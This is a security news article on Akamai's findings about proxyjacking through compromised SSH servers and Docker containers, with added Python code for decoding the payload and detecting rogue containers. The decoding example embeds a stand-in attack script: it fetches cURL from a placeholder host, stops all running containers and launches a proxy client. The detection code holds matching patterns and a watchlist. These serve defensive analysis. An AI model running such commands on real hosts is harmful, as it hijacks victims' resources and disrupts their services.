Threat actors are exploiting vulnerable Secure Shell (SSH) servers to launch Docker containers that take advantage of an emerging and lucrative attack vector: hijacking a victim's network bandwidth for money.
Investigators from the Akamai Security Intelligence Response Team (SIRT) discovered the campaign, which is still active and uses an emerging attack type called proxyjacking, in June, the researchers revealed in a blog post last week.
Threat actors use SSH for remote access and then, without the victim's knowledge, execute malicious scripts that enroll the victim's servers in a legitimate peer-to-peer (P2P) proxy network such as Peer2Profit or Honeygain, the researchers said. These networks, which rely on companion apps or software installed on internet-connected devices, let users share their internet bandwidth with customers who pay to route traffic through the users' IP addresses.
“This allows the attacker to monetize the extra bandwidth of an unsuspecting victim, with only a fraction of the resource load that would be required for crypto mining, with less chance of discovery,” Allen West, a SIRT security researcher, wrote in the post.
In a nutshell, that's proxyjacking: an emerging attack model that exploits these services at scale and could generate hundreds of thousands of dollars a month in passive income for cybercriminals, the researchers found.
The underlying idea isn't new (think of cryptojacking, an outright illegal venture, as a distant cousin), but the ability to make easy money by piggybacking on someone else's bandwidth as an affiliate of mainstream companies is, which explains why security researchers are seeing more proxyjacking in the threat landscape, West warned.
“By providing an easy path to financial gain, this vector poses a threat to both the corporate world and the average consumer, increasing the need for awareness and, hopefully, mitigation,” he wrote.
Proxyjacking also makes it easy for threat actors to cover their tracks, because malicious traffic is routed through a large number of peer nodes before reaching its final destination, the study said. This makes it difficult for victims or investigators to pinpoint the origin of the activity, another attractive feature for attackers looking to monetize their access without consequence.
How the attack works
The first indication of the attack came when an attacker established multiple SSH connections to one of Akamai's honeypots and ran a Bash script that had been Base64-encoded twice to obscure its contents. The researchers decoded the script and were able to observe the threat actor's proxyjacking method down to the exact sequence of operations.
The script turned the compromised system into a node in the Peer2Profit proxy network, using the account specified by the $PACCT variable as the partner that would be credited for the shared bandwidth, according to Akamai SIRT. The same process was used a while later for a Honeygain installation.
“The script is designed to be unobtrusive and robust and attempts to run regardless of the software installed on the host system,” West wrote.
The script then performs several functions, including downloading a genuine, unmodified copy of cURL, a command-line tool for transferring data to and from servers.
This tool appears to be all the attackers need for the scheme to work, and "if it's not present on the victim's host, the attacker downloads it on their behalf," West wrote.
The script stops every container already running on the host, then installs a Docker container that runs the proxy client. Once it is in place, the attacker can disconnect and leave the host without a trace.
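The decode-and-triage step described above, as an added example that is not Akamai's code and not the real payload: the sample script below is a constructed stand-in that only mirrors the stages the article lists (fetch cURL if missing, stop running containers, start a proxy container keyed to $PACCT), with placeholder hostnames and image names; `peel_base64` and `triage` are names chosen here.

```python
import base64
import binascii
import re
from typing import Dict, List, Tuple

# Constructed stand-in for the delivered script (NOT the real payload).
# The lines mirror the stages Akamai described; the URL and image are placeholders.
SAMPLE_SCRIPT = """#!/bin/bash
PACCT="partner-account-placeholder"
command -v curl >/dev/null 2>&1 || curl -sSLo /tmp/curl http://example.invalid/curl
docker stop $(docker ps -q) >/dev/null 2>&1
docker run -d --restart=always -e PACCT="$PACCT" example.invalid/proxy-client:latest
"""


def double_encode(text: str) -> str:
    """Base64-encode twice, the layering the article describes."""
    once = base64.b64encode(text.encode()).decode()
    return base64.b64encode(once.encode()).decode()


# What an analyst would actually receive from the honeypot capture.
SAMPLE_PAYLOAD = double_encode(SAMPLE_SCRIPT)


def peel_base64(blob: str, max_layers: int = 8) -> Tuple[str, int]:
    """Strip nested Base64 layers until the data is no longer valid Base64
    or no longer decodes to readable text. Returns (plaintext, layers_removed)."""
    current = blob.strip()
    layers = 0
    while layers < max_layers:
        try:
            decoded = base64.b64decode(current, validate=True)
        except (binascii.Error, ValueError):
            break  # not Base64 any more: we have reached the script itself
        try:
            text = decoded.decode("utf-8")
        except UnicodeDecodeError:
            break  # binary blob, stop rather than mangle it
        if not all(ch.isprintable() or ch in "\n\r\t" for ch in text):
            break
        current = text
        layers += 1
    return current, layers


# The stages the article attributes to the script, as detection patterns.
STAGES = [
    ("fetches cURL if absent", re.compile(r"\bcurl\b")),
    ("stops running containers", re.compile(r"docker\s+stop\b")),
    ("starts a container", re.compile(r"docker\s+run\b")),
    ("references partner account $PACCT", re.compile(r"\$PACCT\b")),
]


def triage(script: str) -> Dict[str, object]:
    """Report which stages appear, plus the URLs and images worth blocking."""
    stages = {label: bool(rx.search(script)) for label, rx in STAGES}
    urls: List[str] = re.findall(r"https?://[^\s\"']+", script)
    images: List[str] = [
        line.split()[-1]
        for line in script.splitlines()
        if re.match(r"\s*docker\s+run\b", line)
    ]
    return {"stages": stages, "urls": urls, "images": images}


if __name__ == "__main__":
    plaintext, layers = peel_base64(SAMPLE_PAYLOAD)
    print(f"removed {layers} Base64 layer(s)")
    report = triage(plaintext)
    for label, hit in report["stages"].items():
        print(f"  [{'x' if hit else ' '}] {label}")
    print("  URLs:", report["urls"])
    print("  images:", report["images"])
```

The loop stops at the first layer that is not valid Base64, which is how the honeypot capture collapses to the script without an analyst guessing the nesting depth; the URL and image lists are the indicators you would feed to egress filtering and a container allowlist.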
How do you defend against proxyjacking?
Because proxyjacking is growing more common, is relatively easy to mount, and makes the original perpetrators hard to identify, organizations must stay vigilant and watch their networks for anomalous use of their resources so that a compromise is caught early, the researchers recommend.
In the attack the Akamai team observed, the attackers used SSH to access a server and install a Docker container. To catch this type of attack, organizations can monitor their locally running Docker services for unwanted containers sharing the system, Akamai said. If one is found, the intrusion must be investigated to determine how the script was uploaded and executed, followed by a thorough cleanup.
Another notable feature of the attack is that the cURL executable is likely to be overlooked by most companies, since the tool has many legitimate uses. In this case, however, it was the first artifact that led the researchers to dig deeper, West said.
“It was the ability to look at the source of the artifact that took it from a harmless piece of code to what we know now as part of a proxyjacking scheme,” he explained, which “emphasizes the importance of being able to isolate all unusual artifacts, not just those considered malignant.”
Furthermore, because proxyjacking attackers also exploit vulnerabilities to gain access (a recent attack exploited the infamous Log4j flaw), organizations should keep their assets up to date and apply patches to applications as soon as they become available, particularly for vulnerabilities that are already being exploited, the study recommends.
Added West, “Users more knowledgeable about computer security can also stay vigilant by paying attention to the containers currently running, monitoring network traffic for anomalies, and even running regular vulnerability scans.”
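The container check recommended above (monitor locally running Docker services for unwanted containers), as an added example that is not Akamai's tooling: it parses `docker ps --format '{{json .}}'` output, flags any container whose image, name or command mentions the two bandwidth-sharing networks named in the research, and separately flags any image that is not on an expected-image allowlist. The `docker ps` lines are a constructed sample, not a capture from a real host; the allowlist, the `honeygain/honeygain` image tag and the placeholder `example.invalid` image are assumptions made for the example.

```python
import json
import shutil
import subprocess
from typing import Dict, Iterable, List, Optional

# Constructed sample of `docker ps --format '{{json .}}'` output (one JSON
# object per line). Not from a real host; the field names are the ones the
# docker CLI emits for that format string.
SAMPLE_DOCKER_PS = """\
{"ID":"a1b2c3d4e5f6","Image":"nginx:1.25","Names":"web","Status":"Up 3 days","Ports":"0.0.0.0:443->443/tcp","Command":"nginx -g daemon off;","CreatedAt":"2023-06-01 10:00:00 +0000 UTC"}
{"ID":"0f9e8d7c6b5a","Image":"honeygain/honeygain:latest","Names":"relaxed_morse","Status":"Up 2 hours","Ports":"","Command":"/honeygain","CreatedAt":"2023-06-20 03:12:44 +0000 UTC"}
{"ID":"123456abcdef","Image":"example.invalid/proxy-client:latest","Names":"p2p","Status":"Up 2 hours","Ports":"","Command":"/entrypoint.sh","CreatedAt":"2023-06-20 03:12:50 +0000 UTC"}
"""

# The two P2P bandwidth-sharing networks named in the Akamai research.
PROXY_WATCHLIST = ("peer2profit", "honeygain")


def parse_docker_ps(output: str) -> List[Dict[str, str]]:
    """Turn json-per-line `docker ps` output into a list of container records."""
    return [json.loads(line) for line in output.splitlines() if line.strip()]


def flag_containers(containers: Iterable[Dict[str, str]],
                    allowlist: Iterable[str]) -> List[Dict[str, object]]:
    """Return the containers that look like proxyjacking, with the reason(s).

    Two independent checks: a watchlist hit on image/name/command, and an
    image that is not one the host is expected to run (the allowlist is an
    assumed, site-specific input)."""
    allowed = set(allowlist)
    findings = []
    for c in containers:
        haystack = " ".join(
            c.get(key, "") for key in ("Image", "Names", "Command")
        ).lower()
        reasons = [
            f"matches bandwidth-sharing client '{needle}'"
            for needle in PROXY_WATCHLIST
            if needle in haystack
        ]
        image = c.get("Image", "")
        if image not in allowed:
            reasons.append("image not in expected-image allowlist")
        if reasons:
            findings.append({
                "id": c.get("ID"),
                "image": image,
                "names": c.get("Names"),
                "reasons": reasons,
            })
    return findings


def live_docker_ps() -> Optional[str]:
    """Run docker ps on this host if the CLI is present; otherwise None."""
    if shutil.which("docker") is None:
        return None
    try:
        proc = subprocess.run(
            ["docker", "ps", "--format", "{{json .}}"],
            capture_output=True, text=True, check=True, timeout=10,
        )
    except (subprocess.SubprocessError, OSError):
        return None
    return proc.stdout


if __name__ == "__main__":
    expected_images = {"nginx:1.25"}  # assumed allowlist for this host
    output = live_docker_ps() or SAMPLE_DOCKER_PS
    for f in flag_containers(parse_docker_ps(output), expected_images):
        print(f"[!] {f['id']} {f['image']} ({f['names']}): {'; '.join(f['reasons'])}")
```

The allowlist check is the one that matters on a fleet: attackers will not keep using the image names on any public watchlist, but a container that nobody provisioned is an anomaly regardless of what it is called, and it is the cue to pull the SSH auth logs and find how the script arrived.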